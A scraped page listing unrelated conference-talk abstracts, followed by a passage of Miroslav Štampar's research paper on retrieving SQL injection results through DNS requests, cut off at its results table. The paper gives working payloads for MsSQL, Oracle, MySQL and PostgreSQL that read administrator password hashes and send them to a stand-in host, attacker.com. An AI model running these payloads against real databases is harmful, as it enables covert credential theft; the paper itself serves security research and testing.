These are the slides from a talk "DNS exfiltration using sqlmap" held at PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) by Miroslav Stampar.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate in detail common and uncommon problems, and their respective solutions, with examples of what a penetration tester faces when he wants to take advantage of any kind of SQL injection flaw in real-world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single-entry UNION query SQL injection, IDS bypasses specific to particular web application technologies, and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
The presentation highlights techniques to exploit a MySQL, PostgreSQL or Microsoft SQL Server database server in the real world: how to abuse database features to take over the server as a whole, how to break out of the mere database process, get control of the operating system and escalate the process's privileges to SYSTEM, and how to make the life of the forensic analyst harder in a post-exploitation investigation.
These slides have been presented at AthCon 2010 conference in Athens on June 3, 2010.
Advanced SQL injection to operating system full control (slides) by Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web applications on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those overlooked and theoretically not exploitable scenarios: from command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These slides have been presented at the Black Hat Europe conference in Amsterdam on April 16, 2009.
Advanced SQL injection to operating system full control (whitepaper) by Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web applications on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those overlooked and theoretically not exploitable scenarios: from command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
In computing, a denial-of-service (DoS) attack is an attempt to make a machine or network resource unavailable to its intended users, such as to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet - Wikipedia
It all starts with the ' (SQL injection from attacker's point of view) by Miroslav Stampar
These are the slides from a talk "It all starts with the ' (SQL injection from attacker's point of view)" held at FSec 2011 conference (Croatia / Varazdin 22nd September 2011) by Miroslav Stampar
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ... by Ajin Abraham
Mobile Security Framework (MobSF) is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. It can be used for effective and fast security analysis of Android and iOS applications and supports both binaries (APK & IPA) and zipped source code. MobSF can also perform Web API security testing with its API Fuzzer, which can do information gathering, analyze security headers, and identify mobile-API-specific vulnerabilities like XXE, SSRF, Path Traversal, IDOR, and other logical issues related to session handling and API rate limiting.
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012 by Scott Sutherland
During this presentation attendees will be introduced to lesser known, yet significant, vulnerabilities in SQL Server implementations related to common trust relationships, misconfigurations, and weak default settings. The issues that will be covered are often leveraged by attackers to gain unauthorized access to high value systems, applications, and sensitive data. An overview of each issue, common vectors of attack, and manual techniques will be covered. Finally, newly created Metasploit modules and TSQL scripts will be demonstrated that help automate the attacks. This presentation will be valuable to penetration testers who are looking for faster ways to gain access to critical data and systems. Additionally, it should be worthwhile for developers and database administrators who are interested in gaining a better understanding of how to protect their applications and databases from these attacks.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This is a method to attack web applications that have a data repository. The attacker would send a specially crafted SQL statement that is designed to cause some malicious action. SQL injection is an attack technique that exploits a security vulnerability occurring in the database layer of an application or a service. This is most often found within web pages with dynamic content.
Injecting Security into vulnerable web apps at Runtime by Ajin Abraham
Web application security is not hard, but it's easy to get it wrong, as writing secure code is not as easy as preaching it. So to overcome incidents arising from such unforeseen events, organisations tend to rely on Web Application Firewalls, or WAFs. Web Application Firewalls have been in the industry for a long time. Every one of them either works outside or around the web application and acts by intercepting the HTTP request coming to the web server, then takes a decision to allow or block the request based on traditional signature checks. They are never aware of what is happening inside the application: how the user input is getting interpreted, whether the application/server is under heavy load, whether the attacker is exfiltrating data by exploiting an SQLi that the WAF couldn't detect, etc. The strength of a traditional WAF depends on manual or predefined rules/signatures. As a result, they have the limitation that they will get bypassed if a payload is not present in their signature list. In the occurrence of a zero day, a WAF in most cases won't be able to prevent an attack, as it doesn't know the signature of the exploit yet.
In this talk I will share my research outcomes on implementing a runtime application patching algorithm on an insecurely coded application to make it secure against code injection vulnerabilities and other logical issues related to web applications. I will introduce the next generation web application defending technology dubbed Runtime Application Self Protection (RASP), which works by understanding your application to defend against web attacks from inside the web application. RASP relies on runtime patching to inject security into web apps implicitly without introducing additional code changes. The root cause of all the code injection vulnerabilities is that the language interpreter cannot distinguish between data and code. The proposed solution will detect code context breakout to effectively detect and prevent code injections with the help of runtime hooking and patching at the framework API or language API level. The research focuses mainly on detecting and preventing vulnerabilities like SQL Injection, Cross Site Scripting, Remote Command Execution, HTTP Verb Tampering, Header Injection, File Upload Bypass, Path Traversal, etc., and other application security challenges like Session Hijacking, Credential Stuffing and Layer 7 DDoS. This research is carried out by implementing a RASP module for a vulnerable web application written in Python using the Tornado framework with an SQLite backend.
A basic tutorial on using sqlmap on Kali Linux for SQL injection.
The main focus is on a comparison between manual and automated SQL injection.
Some important parameters are discussed, along with steps to be taken to discover vulnerabilities.
By Rushikesh Kulkarni, president of the Anonymous Club of BMSCE
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
Advanced SQL injection to operating system full control (short version) by Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web applications on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
These slides have been presented at OWASP AppSec Europe 2009 conference in Krakow on May 13, 2009.
Full version presented at Black Hat Europe 2009 Conference, slides available here, http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides.
Advanced SQL injection to operating system full control (short version) by Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web applications on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
These slides have been presented at EUSecWest conference in London on May 28, 2009.
Full version presented at Black Hat Europe 2009 Conference, slides available here, http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides.
SQLMAP is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
SQL injection exploitation internals: How do I exploit this web application injection point?
These slides have been presented at a private conference in London on January 9, 2009.
Presentation by Jaime Nebrera of Eneo Tecnología S.L. during the XV Jornada de Seguridad TI of Nextel S.A. at the Alhóndiga in Bilbao on Thursday, 27 June 2013.
DETECTION OF ALGORITHMICALLY GENERATED MALICIOUS DOMAIN USING FREQUENCY ANALYSIS by ijcsit
ABSTRACT
Malicious use and exploitation of Dynamic Domain Name Services (DDNS) capabilities poses a serious threat to the information security of organisations and businesses. In recent times, many malware writers have relied on DDNS to maintain their Command and Control (C&C) network infrastructure to ensure a persistent presence on a compromised host. Amongst the various DDNS techniques, Domain Generation Algorithm (DGA) is often perceived as the most elusive and difficult to detect using traditional methods. This paper presents an approach for detecting DGA using frequency analysis of the character distribution and the weighted scores of the domain names. The approach's feasibility is demonstrated using a range of legitimate domains and a number of malicious algorithmically-generated domain names. When a weighted score of < 45 is applied to the Alexa one million list of domain names, only 15% of the domain names were treated as non-human generated.
Presentation on 'The Path to Resolverless DNS' by Geoff Huston (APNIC)
Presentation on 'The Path to Resolverless DNS' by Geoff Huston for OARC 39 and 47th CENTR technical workshop, held in Belgrade on 22 and 23 October 2022
Nowadays DNS is used to load balance, fail over, and geographically redirect connections. DNS has become so pervasive that it is hard to identify a modern TCP/IP connection that does not use DNS in some way. Unfortunately, due to the reliability built into the fundamental RFC-based design of DNS, most IT professionals don't spend much time worrying about it. If DNS is maliciously attacked, whether by altering the addresses it gives out or by taking it offline, the damage will be enormous. Whether conducted for political motives, financial gain, or just the notoriety of the attacker, the damage from a DNS attack can be devastating for the target.
In this research we will review different advanced DNS attacks and analyze them. We will survey some of the main DNS vulnerabilities and ways of protecting against DNS attacks.
This is a presentation about DNS Cache Poisoning which was presented to the Grey H@t club at Georgia Tech. It covers the basics of DNS, how DNS is vulnerable, the effect of exploiting DNS, and the Kaminsky attack.
A presentation on DNS concepts. It covers the topics DNS Introduction, DNS Hierarchy, DNS Resolution Process, DNS Components, DNS Types, DNSSEC, DNS over TLS (DoT) & HTTPS (DoH), Oblivious DNS (ODoH).
These are the slides from a guest talk "2014 – Year of Broken Name Generator(s)" held at Faculty of Electrical Engineering and Computing 2015 (Croatia / Zagreb 16th January 2015) by Miroslav Stampar
These are the slides from a talk "Riding the Overflow - Then and Now" held at BalCCon 2014 (Serbia / Novi Sad 06th September 2014) by Miroslav Stampar
p.s. this presentation along with presented buffer overflow examples can be found at: http://www.mediafire.com/download/gjeue4wvw2iccc9/balccon2k14_overflow.7z
These are the slides from a guest talk "Hash DoS Attack" held at Faculty of Electrical Engineering and Computing 2014 (Croatia / Zagreb 17th January 2014) by Miroslav Stampar
These are the slides from a talk "Heuristic methods used in sqlmap" held at FSec 2013 conference (Croatia / Varazdin 19th September 2013) by Miroslav Stampar
These are the slides from a talk "Spot the Web Vulnerability" held at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) by Miroslav Stampar.
These are the slides from a talk "Analysis of mass SQL injection attacks" held at FSec 2012 conference (Croatia / Varazdin 21st September 2012) by Miroslav Stampar
These are the slides from a talk "sqlmap - security development in Python" held at EuroPython 2011 conference (Italy / Florence 19th–26th June 2011) by Miroslav Stampar
Key Trends Shaping the Future of Infrastructure.pdf by Cheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
PHP Frameworks: I want to break free (IPC Berlin 2024) by Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
Search and Society: Reimagining Information Access for Radical Futures by Bhaskar Mitra
The field of Information retrieval (IR) is currently undergoing a transformative shift, at least partly due to the emerging applications of generative AI to information access. In this talk, we will deliberate on the sociotechnical implications of generative AI for information access. We will argue that there is both a critical necessity and an exciting opportunity for the IR community to re-center our research agendas on societal needs while dismantling the artificial separation between the work on fairness, accountability, transparency, and ethics in IR and the rest of IR research. Instead of adopting a reactionary strategy of trying to mitigate potential social harms from emerging technologies, the community should aim to proactively set the research agenda for the kinds of systems we should build, inspired by diverse explicitly stated sociotechnical imaginaries. The sociotechnical imaginaries that underpin the design and development of information access technologies need to be explicitly articulated, and we need to develop theories of change in the context of these diverse perspectives. Our guiding future imaginaries must be informed by other academic fields, such as democratic theory and critical theory, and should be co-developed with social science scholars, legal scholars, civil rights and social justice activists, and artists, among others.
UiPath Test Automation using UiPath Test Suite series, part 4 by DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques.
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf (91mobiles)
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo... by James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Epistemic Interaction - tuning interfaces to provide information for AI support by Alan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Data Retrieval over DNS in SQL Injection Attacks
Miroslav Štampar
AVL-AST d.o.o., Zagreb, Croatia
miroslav.stampar@avl.com

Abstract
This paper describes an advanced SQL injection technique in which the DNS resolution process is exploited to retrieve the results of malicious SQL queries. The resulting DNS requests are intercepted by the attackers themselves at a remote name server under their control, extracting valuable data. The open source SQL injection tool sqlmap [1] has been adjusted to automate this task. With the modifications done, attackers are able to use this technique for fast and low-profile data retrieval, especially in cases where the other standard techniques fail.

1 Introduction
Exfiltration is a military term for the removal of assets from within enemy territory by covert means. It now has an excellent modern usage in computing, meaning the illicit extraction of data from a system. The most covert data extraction method is considered to be Domain Name Server (DNS) exfiltration [2]. This method can even be used on systems without a public network connection, by resolving domain name queries outside the perimeter of trusted hosts through a series of internal and external name servers.

DNS is a relatively simple protocol. Both the query made by a DNS client and the corresponding response provided by a DNS server use the same basic DNS message format. With the exception of zone transfers, which use TCP for the sake of reliability, DNS messages are encapsulated within a UDP datagram. To someone monitoring a machine with a tool like Wireshark [3], a covert channel implemented over DNS would look like a series of little blips that flash in and out of existence [4].

The act of relaying DNS queries from secure systems to arbitrary internet-based name servers forms the basis of this uncontrolled data channel. Even if we assume that connections to public networks are not allowed, if the target host is able to resolve arbitrary domain names, data exfiltration is possible via forwarded DNS queries [5].

When other, faster SQL injection (SQLi) data retrieval techniques fail, data is usually retrieved in a bit-by-bit manner, which is a very noisy¹ and time consuming process. Thus, attackers will typically need tens of thousands of requests to retrieve the content of a regular sized table. What is going to be described is a technique where attackers can retrieve the results of malicious SQL queries (e.g. the administrator password) by provoking specially crafted DNS requests from the vulnerable Database Management System (DBMS) and intercepting them at the other end, transferring dozens of resulting characters per single iteration.

2 Technique classification
Depending on the transport channel used for data retrieval, SQLi techniques can be divided into three independent classes: inband, inference and out-of-band [6][7].

Inband techniques use the existing channel between the attackers and a vulnerable web application to extract data. Usually that channel is the standard web server response. Its member, the union technique², uses the existing web page output, while the error-based technique uses provoked DBMS-specific error messages, both carrying the results of the executed malicious SQL query.

Inference techniques extract malicious SQL query results in a bit-by-bit manner, never transferring the actual data. Rather, a difference in the way an application behaves allows attackers to infer the value of the data. As the core of inference is a question [8], it consists of carrying out a series of boolean queries to the server, observing and finally deducing the meaning of the received answers. Depending upon the observed characteristics, its members are called the boolean-based blind and the time-based technique. In the boolean-based blind technique, visible changes inside the web server response are used to distinguish the answers to the given logical questions, while in the time-based technique³ changes in web server response times are observed⁴.

Out-of-band (OOB) techniques, contrary to inband ones, use alternative transport channel(s) for data retrieval, like the Hypertext Transfer Protocol (HTTP) or DNS resolution. Exploitation using OOB techniques becomes interesting when detailed error messages are disabled, results are being limited or filtered, outbound

¹ Noisy in terms of both traffic and system resources used by the vulnerable web server
² Includes the full and partial union techniques, distinguished by the number of resulting rows contained in the web server response
³ Also includes a stacked-queries technique retrieving results in the same manner
⁴ For example, a delayed response for True and a regular response for False
filter rules are lax, inference methods look like the only option, and/or when reducing the number of queries is of utter importance [9]. For example, in the HTTP based OOB technique the SQL query result becomes a part of an HTTP request (e.g. a GET parameter value) toward an HTTP server controlled by attackers who have access to its log files. This class of techniques is not as widely used in the mainstream as the others, mostly because of the complexity of the required setup, but by using them many obstacles could potentially be overcome (e.g. avoiding undesired database writes, and a huge speed improvement over time-based SQLi on vulnerable INSERT/UPDATE statements).

3 DNS resolution
When a client needs to look up a network name used inside a program, it queries DNS servers. DNS queries resolve in a number of different ways:
• A client can answer a query locally using cached information, if it was already obtained previously with an identical query.
• A DNS server can use its own cache and/or zone record information to answer the query – this process is known as iterative.
• A DNS server can also forward the query to other DNS servers on behalf of the requesting client to fully resolve the name, then send the answer back to the client – this process is known as recursive [10].

For example, consider the usage of the recursion process to resolve the name test.example.com. It occurs when a DNS server and a client are first started and have no locally cached information that could be used to resolve that name query. Also, it is assumed that the name queried by the client is for a domain name of which the server has no local knowledge, based on its configured zones.

First, the default DNS server parses the full name and determines that it needs the location of the server that is authoritative for the Top-Level Domain (TLD) – in this case com. It then uses an iterative (nonrecursive) query to that server to obtain a referral for the example.com domain.

After its address has been retrieved, the referred server is contacted – which is actually a registered name server for the example.com domain. As it contains the queried name as part of its configured zones, it responds authoritatively back to the original server that initiated the process with the resulting IP address.

When the original DNS server receives the response indicating that an authoritative answer was obtained for the requested query, it forwards this answer back to the client and the recursive query process ends [11]. This type of resolution is typically initiated by the DNS server that attempts to resolve a recursive name query for the DNS client and is sometimes referred to as "walking the tree" [12].

Figure 1: Recursive DNS resolution

4 Provoking DNS requests
A prerequisite for a successful DNS exfiltration of data from a vulnerable database is the availability of DBMS subroutines that directly or indirectly provoke the DNS resolution process. Those kinds of subroutines are then used by attackers in SQLi vectors. Any function that accepts a network address is most probably exploitable for this kind of attack.

4.1 Microsoft SQL Server
An extended stored procedure is a dynamic link library that runs directly in the address space of Microsoft SQL Server (MsSQL). There are a couple of undocumented extended stored procedures that can be found particularly useful for this paper's purpose [13].

Attackers can exploit any of the following extended stored procedures to provoke DNS address resolution by using the Microsoft Windows Universal Naming Convention (UNC) file and directory path format. The UNC syntax for Windows systems has the generic form:
    \\ComputerName\SharedFolder\Resource
By using a custom crafted address as the value of the ComputerName field, attackers are able to provoke DNS requests.
4.1.1 master..xp_dirtree
The extended stored procedure master..xp_dirtree() is used to get a list of all folders and their subfolders inside the given folder:
    master..xp_dirtree '<dirpath>'
For example, to get a list of all folders and their subfolders inside C:\Windows run:
    EXEC master..xp_dirtree 'C:\Windows';

4.1.2 master..xp_fileexist
The extended stored procedure master..xp_fileexist() is used to determine whether a particular file exists on the disk:
    master..xp_fileexist '<filepath>'
For example, to check whether the file boot.ini exists on disk C: run:
    EXEC master..xp_fileexist 'C:\boot.ini';

4.1.3 master..xp_subdirs
The extended stored procedure master..xp_subdirs() is used to get a list of folders inside the given folder⁵:
    master..xp_subdirs '<dirpath>'
For example, to get a list of all folders with depth 1 inside the C:\Windows folder run:
    EXEC master..xp_subdirs 'C:\Windows';

4.1.4 Example
What follows is an example where the administrator's (sa) password hash is being pushed through the DNS resolution mechanism by usage of MsSQL's extended stored procedure master..xp_dirtree()⁶:
    DECLARE @host varchar(1024);
    SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa')+'.attacker.com';
    EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');
This precalculation form is used because the extended stored procedures don't accept subqueries as parameter values. Hence the usage of a temporary variable for storing the result of the SQL query.

4.2 Oracle
Oracle supplies a bundle of PL/SQL packages with its Oracle Database Server to extend database functionality. A couple of these are especially made for network access, making them specially interesting for this paper's purpose⁷.

4.2.1 UTL_INADDR.GET_HOST_ADDRESS
Package UTL_INADDR provides procedures for internet addressing support – like retrieving host names and IP addresses of local and remote hosts. Its member function GET_HOST_ADDRESS() retrieves the IP address of the specified host:
    UTL_INADDR.GET_HOST_ADDRESS('<host>')
For example, to get the IP address of the host test.example.com run:
    SELECT UTL_INADDR.GET_HOST_ADDRESS('test.example.com') FROM DUAL;

4.2.2 UTL_HTTP.REQUEST
Package UTL_HTTP makes HTTP callouts from SQL and PL/SQL. Its procedure REQUEST() returns up to the first 2000 bytes of data retrieved from the given address:
    UTL_HTTP.REQUEST('<url>')
For example, to get the first 2000 bytes of data from a page located at http://test.example.com/index.php run:
    SELECT UTL_HTTP.REQUEST('http://test.example.com/index.php') FROM DUAL;

4.2.3 HTTPURITYPE.GETCLOB
The instance method GETCLOB() of the class HTTPURITYPE returns the Character Large Object (CLOB) retrieved from the given address⁸:
    HTTPURITYPE('<url>').GETCLOB()
For example, to start content retrieval from a page located at http://test.example.com/index.php run:
    SELECT HTTPURITYPE('http://test.example.com/index.php').GETCLOB() FROM DUAL;

⁵ In comparison with master..xp_dirtree(), master..xp_subdirs() returns only those directories with depth 1
⁶ The other described MsSQL extended stored procedures can be used in exactly the same way
⁷ Oracle is the only DBMS which doesn't need UNC file path formatting for provoking DNS requests, making attacks usable on both Windows and Linux back-end platforms
⁸ There are also other similar instance methods of the class HTTPURITYPE that can be used for this paper's purpose (e.g. GETBLOB(), GETCONTENTTYPE() and GETXML()) [14]
4.2.4 DBMS_LDAP.INIT
Package DBMS_LDAP enables PL/SQL programmers to access data from Lightweight Directory Access Protocol (LDAP) servers. Its INIT() procedure is used to initialize a session with the LDAP server:
    DBMS_LDAP.INIT('<host>',<port>)
For example, to initialize a connection with the host test.example.com run:
    SELECT DBMS_LDAP.INIT('test.example.com',80) FROM DUAL;
Attackers can use any of the mentioned Oracle subroutines to provoke DNS requests. However, starting with Oracle 11g, subroutines which could cause network access are restricted, except DBMS_LDAP.INIT() [15][16].

4.2.5 Example
What follows is an example where the system administrator's (SYS) password hash is being pushed through the DNS resolution mechanism by usage of Oracle's procedure DBMS_LDAP.INIT()⁹:
    SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.attacker.com',80) FROM DUAL;

4.3 MySQL

4.3.1 LOAD_FILE
MySQL's function LOAD_FILE() reads the file content and returns it as a string:
    LOAD_FILE('<filepath>')
For example, to get the content of a file located at C:\Windows\system.ini run¹⁰:
    SELECT LOAD_FILE('C:\\Windows\\system.ini');

4.3.2 Example
What follows is an example where the system administrator's (root) password hash is being pushed through the DNS resolution mechanism by usage of MySQL's function LOAD_FILE():
    SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com\\foobar'));

4.4 PostgreSQL

4.4.1 COPY
PostgreSQL's statement COPY copies data between filesystem files and a table:
    COPY <table>(<column>,...) FROM '<path>'
For example, to copy the content of a file located at C:\Windows\Temp\users.txt to a table named users containing the single column names run¹¹:
    COPY users(names) FROM E'C:\\Windows\\Temp\\users.txt'

4.4.2 Example
What follows is an example where the system administrator's (postgres) password hash is being pushed through the DNS resolution mechanism by usage of PostgreSQL's statement COPY:
    DROP TABLE IF EXISTS table_output;
    CREATE TABLE table_output(content text);
    CREATE OR REPLACE FUNCTION temp_function()
    RETURNS VOID AS $$
    DECLARE exec_cmd TEXT;
    DECLARE query_result TEXT;
    BEGIN
    SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE usename='postgres');
    exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.attacker.com\\\\foobar.txt\'';
    EXECUTE exec_cmd;
    END;
    $$ LANGUAGE plpgsql SECURITY DEFINER;
    SELECT temp_function();
This precalculation form is used because the SQL statement COPY doesn't accept subqueries. Also, in PostgreSQL variables have to be explicitly declared and used inside a subroutine scope (function or procedure). Hence the usage of a user-defined stored function.

5 Implementation
As mentioned, the SQL injection tool sqlmap has been chosen, mostly because the author of this paper is also one of its developers, and upgraded to support DNS exfiltration. A new command line option --dns-domain has been added

⁹ The other described Oracle procedures can be used in exactly the same way if the execution rights haven't been revoked
¹⁰ The backslash character (\) has to be escaped as it has a special meaning in MySQL
¹¹ The backslash character (\) has to be escaped as it has a special meaning in PostgreSQL
as a minimal requirement for the new program workflow. With it the user is able to turn on the DNS exfiltration support and informs sqlmap that all provoked DNS resolution requests should point toward the given domain (e.g. --dns-domain=attacker.com).

The domain's name server entry (e.g. ns1.attacker.com) has to contain the IP address of the machine running the sqlmap instance. From there, sqlmap is run as a fake name server providing valid (but dummy) responses to the provoked incoming DNS resolution requests. The dummy resolution response is served just to unblock the waiting web server instance, without caring about the results, as the program is not processing the web page content itself.

For each item being dumped, sqlmap sends a crafted SQLi DNS exfiltration vector inside a normal HTTP request, while in the background serving and logging all incoming DNS requests. As each malicious SQL query result is enclosed with unique and randomly chosen prefix and suffix strings, it's not difficult to distinguish which DNS resolution request comes from which SQLi DNS exfiltration vector. Also, with those random enclosings any possible DNS caching mechanism is cancelled, practically forcing the required recursive DNS resolution.

Support for the DBMSes MsSQL, Oracle, MySQL and PostgreSQL has been fully implemented. But, as mentioned earlier, only Oracle is able to support the attack on both Windows and Linux back-end platforms, as the others require support for handling of Windows UNC file format paths.

During the sqlmap run, union and error-based techniques have the highest priority, primarily because of their speed and lack of special requirements. Hence, sqlmap will turn on the support for DNS exfiltration only when just the slow inference techniques are available and the option --dns-domain has been explicitly set by the user.

Each resulting DNS resolution request is encoded into hexadecimal form to comply with RFC 1034 [17], a (de-facto) standard for DNS domain names. That way all eventual non-word characters are preserved. Also, the hexadecimal representation of longer SQL query results is split into parts. That has to be done as each node's label (e.g. .example.) inside a full domain name is limited to 63 characters in length.

6 Experimental setup and results
For experimental purposes three machines were configured and used:
1) Attacker (172.16.138.1) – physical machine with Ubuntu 12.04 LTS 64-bit OS running the latest sqlmap v1.0-dev (r5100)¹²
2) Web Server (172.16.138.129) – virtual machine with Windows XP 32-bit SP1 OS running a XAMPP 1.7.3 instance containing a deliberately SQLi vulnerable MySQL/PHP web application
3) DNS Server (172.16.138.130) – virtual machine with CentOS 6.2 64-bit OS running BIND
For the virtual environment VMware Workstation 8.0.2 has been used. All tests were conducted inside a local virtual network (172.16.138.0/24). The Attacker machine has been used to conduct attacks against the vulnerable Web Server machine. The DNS Server machine has been used to handle DNS resolution requests for the attacker.com domain coming from the Web Server machine and forward them to the Attacker machine as its registered name server.

All sqlmap supported techniques were tested, together with the newly implemented DNS exfiltration. The number of HTTP requests and the time spent were measured, where the content of the system table information_schema.COLLATIONS was being dumped (around 4KB in size).

Table 1. Speed comparison of SQLi techniques
Method                  # of requests   Time (sec)
Boolean-based blind     29,212          214.04
